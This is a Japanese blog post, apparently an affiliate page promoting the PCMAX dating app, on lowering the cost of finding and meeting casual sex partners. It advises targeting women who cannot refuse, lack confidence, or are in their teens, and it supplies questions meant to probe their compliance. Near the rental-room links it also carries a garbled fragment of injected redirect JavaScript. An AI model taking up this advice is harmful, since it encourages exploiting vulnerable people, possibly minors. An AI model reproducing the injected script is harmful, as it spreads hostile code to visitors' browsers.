セフレにかかるお金を削減!できるだけ低コストで楽しむ方法とは

  • このエントリーをはてなブックマークに追加
  • Pocket

セフレを作るのってほんとにお金がかかります。新しくセフレを作るのも、既存セフレとの関係を維持するにもお金がかかります。食事代やホテル代や交通費などなど。

特に複数人のセフレがいる人ってお金の運用が大変。僕も経験がありますが、毎月通帳の残高との戦いですよね。

ここでは「セフレにかかるお金」をできるだけ削減する方法を紹介します。セフレにかかるお金を削減できれば、その分浮いたお金で新しいセフレを作って楽しめるし、すでにセフレのお気に入りの子と会う回数を増やすのも良いでしょう。

「お金がなくてセフレが欲しいけど作れない…」
「セフレに使いすぎて今月お金がない…」
「セフレを作ったり、今のセフレと遊びすぎて貯金できない…」

ぜひこんな悩みを抱えている人におすすめです。

経済的に余裕がなく、セフレが欲しいのに作れていない人、すでにセフレはいるけどお金がない人はぜひ最後まで読んで、セフレにかかるお金を削減する方法を身につけてください!

お金のかかるセフレ、かからないセフレがいる

世の中にはセフレにするとお金のかかる女の子と、かからない子がいます。ここではまずお金のかかる女の子、かからない女の子のそれぞれの特徴を紹介します。

お金がかからない女の子をセフレにできれば、経済的に楽になれます。逆にお金のかかる女の子をセフレにしてしまうと、その子に使うお金を削減することは難しいので注意が必要です。出費が増える一方で、お金がいくらあっても足りません。

それぞれの特徴を知って新規でセフレを作る時は、お金のかからない女の子に絞ることが節約の第一歩です。

お金のかかるセフレの特徴

お金のかかるセフレの特徴
– わがままである
– 服やバッグなどにブランド品が多い
– アウトドア派
– 行きたい場所やしたいことなどリードしたがる
– おしゃべり(自分のことをよく喋る)

わがままでおしゃべりで承認欲求が高い女の子は、僕の経験上ほぼ間違いなくお金のかかるセフレです。知り合って間もないころは気を使ってくれるので、お金がかからないかもしれません。しかし、親密度も上がって慣れてくるとわがままが増えます。

「最近できた話題の焼き肉に行こうよ」(高級店)
「大衆居酒屋とかチェーンではうるさいから嫌だ。大人な雰囲気の静かなお店で飲もうよ」
「来月誕生日なの。私今シャネルの財布が欲しいんだあ!」

上のようにお金のかかる要求が徐々に増えます。簡単に見分ける方法は、着ている服や持っているバッグをよく見てください。

ブランド物が多かったり、明らかに高そうな服を着ている場合、お金のかかる女の子である可能性が高いので気をつけてください。

わがままでおしゃべりで承認欲求の強い女の子は、周囲の人から認められたり、すごいと思われたいがためにブランド物を身につけるのです。セフレにしてしまうとお金ばかりなくなってしうので注意が必要です。

余談ですが、過去僕はこの「お金のかかるセフレ」がいた時期がありましたが、誕生プレゼントに50,000円もする財布をねだられたことがあります…。

お金のかからないセフレの特徴

お金のかかるセフレの特徴
– NOと言えない
– 主導権を握ろうとせず相手に身を任せる
– インドア派
– 自分に自信がない
– 10代から20代前半の若い女の子
– 聞き役(会話の中では質問が多い)

自分の主張が少なく、常に受け身でNOと言えない女の子は、お金のかからないセフレになる可能性が高いです。主導権を男側に委ねて、わがままを言わないため、基本的に男側の提案にKOしてくれます。

セフレになる子は基本的に受け身の女の子が多いので、僕の感覚的には7割はお金がかからない女の子です。

例えばご飯を食べるとき、お金のかかるセフレなら「チェーン店はがやがやしてるから嫌だ」などと言うのに対して、お金のかからない女の子はチェーン店を提案しても喜んでついてきてくれます。

また10代から20代前半の若い女の子もお金がかからないです。10代から20代前半の若い女の子はそれまでお金を使って遊んでこなかったので、お金を使うことを知りません。

高いレストランやバーなどは当然行ったことがないので、「連れて行って」とも言われません。ラブホテルも高いところを要求される心配がありません。若い子は何をしていても楽しんでくれるので、基本的にお金がかからないでしょう。

見分けるコツは、会話しているときに「受け身」であるか判断することです。あなたの方が話している割合が多い場合、相手が聞き役の可能性が高いです。自分の話に対してリアクションをするばかりなら、セフレにしてもお金がかからない受け身の女の子でしょう。

セフレにかかる色々なお金

ここからは「セフレを作る時」「セフレと会う時」に一体どれくらいのお金がかかっているのか紹介していきます。みなさんそれぞれどれくらいのお金がかかっているのか、ちゃんと計算したことのある人は少ないでしょう。

まずはどれくらいのお金がかかっているのか把握して、削減できるポイントを後に紹介していきます。

セフレを作る時にかかるお金(新規でセフレを作る場合)

セフレを作る時にかかるお金
– セフレにする女の子と出会うお金
– 食事・飲み代(1〜2回)
– ラブホテル代
– その他雑費(交通費、カフェ代、カラオケ代…etc)

まずは「セフレを作る時にかかる金額」を把握しましょう。上記が主な出費の種類です。最も削減できるのが「セフレにする女の子と出会うお金」です。セフレにする女の子を合コンや街コンで探すと、8,000〜10,000円ほど出会うだけでかかってしまいます。(男側が多く支払うことを想定)

しかし、元々の知り合いや女友達をセフレにする場合、この「セフレにする女の子と出会うお金」は0円で済みます。またナンパで捕まえた女の子をセフレにする場合も0円です。

このようにちょっと工夫するだけで、セフレを作る時にかかるお金は削減できます。逆に何も考えずにセフレを作ろうとすると、平気で下のような金額を失うことになるでしょう。

《すべての支払いをおごる場合》

◎合計:35,000円
・女の子と出会うお金(合コン):8,000円
・初めて2人で飲む(居酒屋ですべておごる):10,000円
・飲み後のカラオケ(すべておごる、約2時間):4,000円
・ホテル代(宿泊ですべておごる):13,000円
※東京都内で遊んだ場合を想定しています。

《割り勘の場合》※女の子にお金を払ってもらうことにためらいがある人は参考にできないです

◎合計:22,000円
・女の子と出会うお金(合コン):8,000円
・初めて2人で飲む(居酒屋ですべておごる):5,000円
・飲み後のカラオケ(すべておごる、約2時間):2,000円
・ホテル代(宿泊ですべておごる):7,000円
※東京都内で遊んだ場合を想定しています。

すべておごれば35,000円、割り勘にしても22,000円…。(ホテル代を割り勘にするのはちょっと気が引けます…難しい…)どちらにしても高いですね…。

セフレと会う時にかかるお金(すでにセフレの子と遊ぶ場合)

セフレと会う時にかかるお金
– 食事・飲み代
– ラブホテル代
– その他雑費(交通費、カフェ代、カラオケ代…etc)

セフレとはお互いにセックスを楽しむための存在です。セックスは実際に女の子と会わなくてはできないので、当然お金がかかってきます。上は主な出費の種類です。

毎回会うたびに食事代、ホテル代を払っていたらかなりの出費につながります。例えば月に4回セフレとあった場合、1ヶ月に以下のお金を失うことになります。

《すべての支払いをおごる場合》※1ヶ月の出費

◎合計:92,000円(月に4回会う場合)
・食事・飲み代(居酒屋ですべておごる):10,000円 × 4回 = 40,000円
・ホテル代(すべておごる):13,000円 × 4回 = 52,000円
※東京都内で遊んだ場合を想定しています。

《割り勘の場合》※1ヶ月の出費

◎合計:48,000円(月に4回会う場合)
・食事・飲み代(居酒屋ですべておごる):5,000円 × 4回 = 20,000円
・ホテル代(すべておごる):7,000円 × 4回 = 28,000円
※東京都内で遊んだ場合を想定しています。

セフレに会ってお酒を飲んで、ラブホテルで宿泊することを想定すると1回で23,000円かかります(すべておごった場合)。1ヶ月で4回会って遊んだだけで92,000円もかかります。割り勘にしても48,000円です…。どっちにしても高い…。

かなり痛い出費ですね。お金に余裕がある人以外は、毎月92,000円もセフレにかけられないでしょう。

安くセフレを作る3つの方法とは

セフレを作る時、すでにいるセフレに会う時に、どれだけお金がかかるか把握できたでしょうか。何も考えずに行動してしまうと、かなりの金額を失うことになりますね。

安くセフレを作る方法を紹介する前に覚えていて欲しいのが、「無料でセフレを作る」と言っている記事について。これはすべてウソです。

セフレを作るのに0円はありえません。食事代、飲み代、ホテル代など絶対にお金はかかるのです。これについて詳しく書いた記事もあるので合わせて読んでみてください。

ここでは新規のセフレを作る時にかかる「女の子と出会うお金」を削減する方法を3つ紹介します。「女の子と出会うお金」は削減できる幅が大きいので、紹介する3つの出会い方を意識すると、かなりの節約につながります。

僕は特に3つ目の「マッチングアプリ」をよく使っています。これが最も安いですね。

1.ストリートナンパでセフレを作る

まずはストリートナンパで女の子と出会う方法です。ストリートナンパとは街中で女の子に声をかけるナンパです。これは上での紹介したようにお金がかからないためおすすめです。

合コンや街コンに参加すると男性側が多く支払うことが基本のため8,000〜10,000円ほどかかりますが、これが0円まで削減できるので、お金のことだけを考えればかなり良い出会い方でしょう。

しかも合コンや街コンはある程度決まった数の女の子としか出会うことはできないのに対して、ナンパで出会える数は無限大です。街にいる女の子がすべてターゲットですからね。自分の好みの子に片っ端から声をかけるだけです。

ただストリートナンパは初心者にはかなりハードルが高い出会い方です。「やったことない」「知らない人に声をかけるのは無理」という人にはおすすめしません。

声をかける時や、そこからカフェなどに連れ出す時にちょっとしたテクニックが必要になるので、簡単には成功しません。かなり精神のすり減る作業です。コミュニケーション能力に自信がある人のみ挑戦すると良いでしょう。

どうしてもストナンに挑戦したい初心者は、下の記事で詳しくストリートナンパからセフレを作る方法を紹介しているので、チェックしてください。

ストナンで女の子と出会ってからセックスするまでにかかるお金(すべての支払いをおごる場合)

◎合計:27,000円
・女の子と出会うお金:0円
・初めて2人で飲む(居酒屋ですべておごる):10,000円
・飲み後のカラオケ(すべておごる、約2時間):4,000円
・ホテル代(宿泊ですべておごる):13,000円
※東京都内で遊んだ場合を想定しています。

2.SNSを使ってセフレになりそうな子とつながる

TwitterやInstagramなどのSNSを使って、セフレになりそうな子を見つけて出会う方法もあります。これも上のストナンと同様、女の子と出会うのにかかる金額は0円。ただお金と労力はトレードオフです。

SNSを使ってセフレを作ったことがない人にはあまりおすすめしません。なぜなら「労力と成果が見合わない」からです。

僕が試してもっとも効果があったのはTwitterですが、全然出会えない…。Twitter上で仲良くなってもリアルで会うのは難しいのです。あとはTwitter上で仲良くなるまでにかなり時間がかかります。

相手の子のツイートに何度もいいねしたり、リツイートしたり…。やっとDMを返してくれるぐらいに仲になってもそこから更にDM上で信頼関係を構築する必要があったりと、とにかく時間がかかる。

それを何人も同時に進行して、会えないなんてこともよくありました。SNSを使った出会いは、とにかくお金がないけどセフレが欲しい!という人以外にはおすすめしません。

もしそれでもいいから挑戦したいという人のために、SNSでセフレを作るための方法を詳しくまとめた記事も用意しましたので読んでみてください。

SNSで女の子と出会ってからセックスするまでにかかるお金(すべての支払いをおごる場合)

◎合計:27,000円
・女の子と出会うお金:0円
・初めて2人で飲む(居酒屋ですべておごる):10,000円
・飲み後のカラオケ(すべておごる、約2時間):4,000円
・ホテル代(宿泊ですべておごる):13,000円
※東京都内で遊んだ場合を想定しています。

3.マッチングアプリを使う

もう1つの方法は出会い系サイトを使うことです。ナンパのように0円ではないですが、合コンや街コンなどの飲み会に参加するよりは女の子と出会うお金を削減できます。

僕が出会い系で、実際に1人の女の子と出会うまでにかかる金額は2,000〜4,000円です。これは合コンや街コンに参加した場合の半額以下ですね。出会い系サイトと聞いて「怪しいんじゃないか」と思う人もいるかもしれませんが、今は当たり前のように使われています。

信頼できるサイトを使えば法外な金額を請求されることもないので安心してください。中にはサクラが多いサイトがありますが、僕がいつも使っているサイトを下で紹介するので、安心して使ってください。

PCMAXへ無料登録はこちら(R18)

援デリ業者には注意する

上で紹介したPCMAXのアプリ内には「援デリ業者」や「割り切り」と呼ばれる、お金さえ払えばセックスさせてくれる女の子が存在します。援デリ業者とはデリヘル業者が素人の女の子を装ってアプリ内でセックスしたい男を釣る業者のことです。

「割り切り」はそれを個人でやっている女の子のことです。どっちもやっていることは風俗と同じで、性欲が溜まっている男からお金をもらってセックスするというビジネスです。

↓のキャプチャのような募集をしているので、見つけても絶対に反応しないこと。
PCMAXでの割り切りや援デリ業者の掲示板の投稿01
PCMAXでの割り切りや援デリ業者の掲示板の投稿02

はっきり言ってブスな子が多いです。正直ここでお金を払うくらいなら、風俗の方がよっぽど可愛い子がいるので注意が必要です。あとは絶対にセフレになりません。

セフレが欲しいと思っているみなさんはこの「援デリ業者」と「割り切り女」には注意してください。PCMAXではメッセージを送るのにポイントを使うので、この人たちにポイントを使うと無駄になってしまいます。

PCMAXを使って安くセフレを作る方法

POINT
1.掲示板でセフレの募集はしない
2.プロフィールページを魅力的にする
3.掲示板のピュアカテゴリで検索する
4.いたって普通の女の子を狙ってメッセージを送る
5.LINEを交換して会う約束をする
6.初めて会う時はとにかく相手の話を聞いてあげる
7.2軒目へ誘って少し下ネタを話す
8.様子を見てホテルや自宅へ誘う
9.別れたあとにすぐにLINEでメッセージを送る

これはPCMAXでセフレを作る手順です。詳しくは↓この記事で紹介してるので合わせて確認してください。

安くPCMAXで作るポイントは「掲示板を絶対に使わないこと」です。掲示板は上で紹介した援デリ業者や割り切り女しか投稿していません。

それに反応するだけではいつまで立っても安くセフレは作れないのです。メッセージを送るのにポイントを使ってばかりでアプリ内で課金するだけ…。

大切なポイントは上のフローで言うと「4.いたって普通の女の子を狙ってメッセージを送る」です。確実に業者でない子と連絡を取りましょう。

マッチングアプリで女の子と出会ってからセックスするまでにかかるお金(すべての支払いをおごる場合)

◎合計:29,000円
・女の子と出会うお金:2,000円
・初めて2人で飲む(居酒屋ですべておごる):10,000円
・飲み後のカラオケ(すべておごる、約2時間):4,000円
・ホテル代(宿泊ですべておごる):13,000円
※東京都内で遊んだ場合を想定しています。
※他の方法よりは2,000円高くなりますが、よりセフレが作れる確実性が高いのでおすすめ

PCMAXへ無料登録はこちら(R18)

セフレと会う時にかかるお金を安くする5つのポイント

すでにセフレがいる人のために、ここからはセフレと会う時にかかるお金を削減する方法を紹介します。上で紹介したように、セフレとご飯をたべて、お酒を飲んで、ホテルに宿泊すると1回で約20,000円かかります。

セフレと週1回、月に4回遊ぶと合計で80,000円かかることになります。もしこの金額を減らすことができれば、新たにもう1人セフレが作れますね。または今のセフレと会う回数を増やすことができます。ぜひこれから紹介する3つの方法を意識して実践してみてください。

1.セックスだけして帰る

これは究極の方法です。ご飯を食べて、お酒を飲む過程を省くだけで1回10,000円の削減になります。またラブホテルも宿泊ではなく、休憩で入れば5,000円程度で済みます。1回遊ぶと20,000円かかる想定だと、15,000円の削減になり、セフレとセックスするのに5,000円で済みます。

1ヶ月で考えると約60,000円の削減になり、4回遊んだとしてで20,000円です。8回(週2回)遊んでも40,000円しかかからないので、かなりお得な方法です。

コンビニでお酒やおつまみを買ってホテルに行けば、軽く飲みながらいちゃいちゃしてセックスを楽しめるので、女の子の満足度はそこまで変わりません。いつもこのパターンだとさすがに飽きてしまうので、ほどほどに実践してみてください。

2.ひとり暮らしを始める

今実家に住んでいる人は1人暮らしを始めてはいかがでしょうか。住む部屋の家賃にもよりますが、上手く安い賃貸に住むことができればセフレにかかるお金は大幅に削減できます。

上で紹介したセフレと遊ぶ時にかかる金額は月に80,000円です。日本で最も高い都内でも80,000円あれば1R、1Kの間取りの部屋は借りることができます。場所にもよりますが、東京以外の地域なら家賃50,000〜70,000円あれば1Kに住むことができます。

1暮らしを始める初期費用や、家具家電を買うことを考えると最初はかなりの投資になりますが、未来のホテル代を考えると節約につながります。毎回のホテルの宿泊代の約10,000円が削減できるので、月に4回遊ぶことを想定すると40,000円の削減です。その分家賃はかかってしまいますが、セフレと会う回数を増やしてもかかるお金は変わらないので、呼びまくりましょう。

3.ホテル代を安くする

上で紹介した「ひとり暮らし」ができない人もいるでしょう。

– お金が貯まらなくなかなかひとり暮らしができない人
– 親の介護など家族と一緒に住む必要がある人
– 結婚している人

ひとり暮らしができない人はホテルでセックスするしかありません。だからそのホテルにかかるお金を削減するのです。ホテル代はセフレと会うときにかかる最も大きな出費です。その大きな出費をまず対策することが節約に繋がります。

ここではホテル代を節約する方法を4つ紹介します。

POINT
3-1.宿泊ではなく休憩やショートタイムで入る
3-2.都心ではなく少し離れた地域のラブホテルを活用する
3-3.漫画喫茶の個室を利用する
3-4.レンタルルームを活用する

セフレと会う頻度は人それぞれだと思いますが、ここでは月に4回(約1週間に1回)会う想定で削減できるコストを計算していきます。

3-1.宿泊ではなく休憩やショートタイムで入る

まずは当たり前ですが、宿泊ではなく休憩やショートタイムで入ることでホテル代を削減できます。

東京のラブホテルの宿泊の相場は10,000円ほどですが、休憩は5,000〜7,000円です。これで3,000〜5,000円の節約ができますね。

地方のラブホテルでも宿泊は5,000〜8,000円。休憩は4,000〜6,000円なので、1,000〜4,000円の節約につながります。

東京のラブホテルを利用することを考えると、月に約16,000円のコスト削減です。 (1回4,000円の削減、月に4回セフレと遊ぶ場合)

3-2.都心ではなく少し離れた地域のラブホテルを活用する

都心のラブホテルは高い傾向があります。だから都心から少し離れた場所のラブホテルに入るのも節約につながる方法です。

いつも遊んでいる場所が東京なら、少し離れた神奈川県や千葉県や埼玉県のラブホテルがおすすめ。僕の感覚ですが、東京のラブホテルが宿泊10,000円ぐらいに対して、ちょっと離れたホテルは7,000〜8,000円です。しかもキレイ。

横浜は「高そう…」と思われがちですが意外に安いです。あとは埼玉県なら大宮や川越、千葉県なら船橋、千葉、柏あたりがおすすめ。

東京のラブホテルに宿泊すると10,000円。都心から離れたホテルに宿泊すると7,000円。1回につき3,000円の節約になり、1ヶ月に4回セフレと会うなら12,000円の節約です。同じ月にもう1回セフレとホテルで会えるぐらい節約できるのは大きいですね。

3-3.漫画喫茶の個室を利用する

漫画喫茶の個室を利用することでホテル代を節約することもできます。普通の部屋ではないですよ。あれは半個室で部屋の上部が空いているので、声などすべてまわりに聞こえてしまいますから。

半個室ではなく、部屋の上部もふさがっている完全な個室を用意している満喫もあります。完全な個室なのでほとんどラブホテルと変わりませんね。

それでいて料金は安いです。都心でも3時間1,500〜2,000円ほど。12時間(宿泊)でも3,000〜5,000円で収まります。

東京のラブホテルに宿泊する場合と比較すると、10,000 ー 2,000で1回8,000円の節約。1月に32,000円のコスト削減につながります。(満喫には3時間で入る想定で2,000円、月に4回セフレと会う想定)

完全個室がある東京の漫画喫茶
自遊空間
Hailey’5 Cafe
NET MARU

3-4.レンタルルームを活用する

レンタルルームとは近年都内に増えつつある簡易ラブホテルです。管轄は旅行業法ではなく、ラブホテルと同じく風俗営業法。東京都内で古くなった雑居ビルを活用したいオーナーが注目している事業です。

ラブホテル同様、宿泊に必要な最低限の設備は完備されています。シャワー、ベット、テレビ、アメニティなど。注目すべきはその値段です。1泊4,000円ほど。

東京のラブホテルの宿泊10,000円と比較すると、6,000円の節約です。月で換算するなら、セフレと4回会う場合は24,000円のコスト削減ですね。お金を節約したいならぜひ活用したい選択肢です。

レンタルルームを探せるサイト
SPACEMARKET
Instabase
dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokyo/love/48803″ target=”_blank” rel=”noopener noreferrer”>MTRL※記事型のコンテンツ

4.お金のかからなそうな女の子を見分ける

4つ目のセフレに会うのにお金をかけない方法は、そもそもお金のかからない子をセフレにすることです。この記事の冒頭で説明したおさらいです。

お金のかかるセフレの特徴
– NOと言えない
– 主導権を握ろうとせず相手に身を任せる
– インドア派
– 自分に自信がない
– 10代から20代前半の若い女の子
– 聞き役(会話の中では質問が多い)

この6つの特徴を持った子を見分けることができれば、セフレになったあともかけるお金が少なくてすみます。では具体的な見分ける方法を紹介します。

LINEなどのメッセージから見分ける方法と、会話のなかで見分ける方法があります。まずはLINEで見分ける方法です。まだセフレになってないときに、会う約束を決めるタイミングで見極めましょう。

下のLINEのキャプチャですが、1枚目はお金のあまりかからないセフレとのやり取りです。2枚目はお金のかかるセフレとのやり取りです。ポイントは受け身であるか、能動的な姿勢かどうかです。

受け身な女の子と約束するときのLINEのキャプチャ

積極的な女の子と約束するときのLINEのキャプチャ

1枚目は全面的に僕に合わせてくれているのに対して、2枚目は積極的に女の子から提案されています。このように会う約束をするときに、 日程や時間や場所を積極的に提案してくる子はお金がかかる可能性があります。

反対にすべて男側に委ねる女の子は、基本的に受け身なで男の提案に対してNOと言いません。結果、どんなに安い居酒屋やチェーン店に連れて行こうが、どんなに安いホテルに連れ行こうが文句を言わずに楽しんでくれるのです。

会話の中での見分け方もメッセージでの見分け方と根本は一緒です。「受け身かどうか」を見分けるだけ。下の質問をしてみて返答で判断してみましょう。

受け身な子かどうか判断するための質問
– 友達と遊ぶときは誘うことが多い?誘われることが多い?
– 今まで男に告白したことある?
– 1人でなにかすることが多い?友達を誘って遊ぶことが多い?
– 彼氏には振り回されたい?振り回したい?

5.熟女をセフレにする

熟女をセフレにするとかかるお金の削減になります、なぜなら熟女はお金を払ってくれるからです。割り勘もしくは全額相手が払ってくれることもあります。熟女(30代なかばから40代)はお金を持っているので、いくら相手が男でも「年下にすべておごらせる訳にはいかない」と母性本能が働きます。

また熟女は色々な経験をしてきています。そのため包容力が同年代の女の子に比べて高く、こちらの要求を受け入れてくれます。ご飯を食べる時もチェーン店でも文句は言わないし、ホテルも多少安くても笑顔で受け入れてくれます。年下の男の子だと思って温かく見守ってくれている感じです。

熟女をセフレにする方法は別の記事で詳しく説明しているので、合わせて読んでみてください。

セフレにかかるお金を削減して合う回数を増やそう!

セフレが欲しい人、セフレがすでにいる人、意外にもセフレにお金がかかってしまうことが理解してもらえたかと思います。ここで紹介した節約法を実践すれば、かなりの金額が削減できます。

節約することで、まだセフレがいない人はセフレを作るチャンスを増やすことができます。また、すでにセフレがいる人はその子と会う(セックスできる)回数を増やすことができるでしょう。

あなたが上手に節約して、セフレとのセックスを最高に楽しめることを陰ながら応援しています。

編集長おすすめの出会い系「PCMAX」

編集長みさわおすすめのマッチングアプリ「PCMAX」。

PCMAXを使った2020年の実績は、お持ち帰りした女の子22人。その中でセフレになった女の子10人です。

ナンパより効率的、クラブより低コスト。たくさんの女の子とワンナイトしたい、何人かの可愛いセフレが欲しい人にはぜひおすすめ。

登録は無料。攻略法さえ理解していれば、スタートダッシュ特典を使って2,000円で1人の女の子とセックスできます。まずは行動あるのみ。下のボタンから使ってみましょう!

PCMAXを使ってみる(R18)

おすすめの記事

  • このエントリーをはてなブックマークに追加
  • Pocket

SNSでもご購読できます。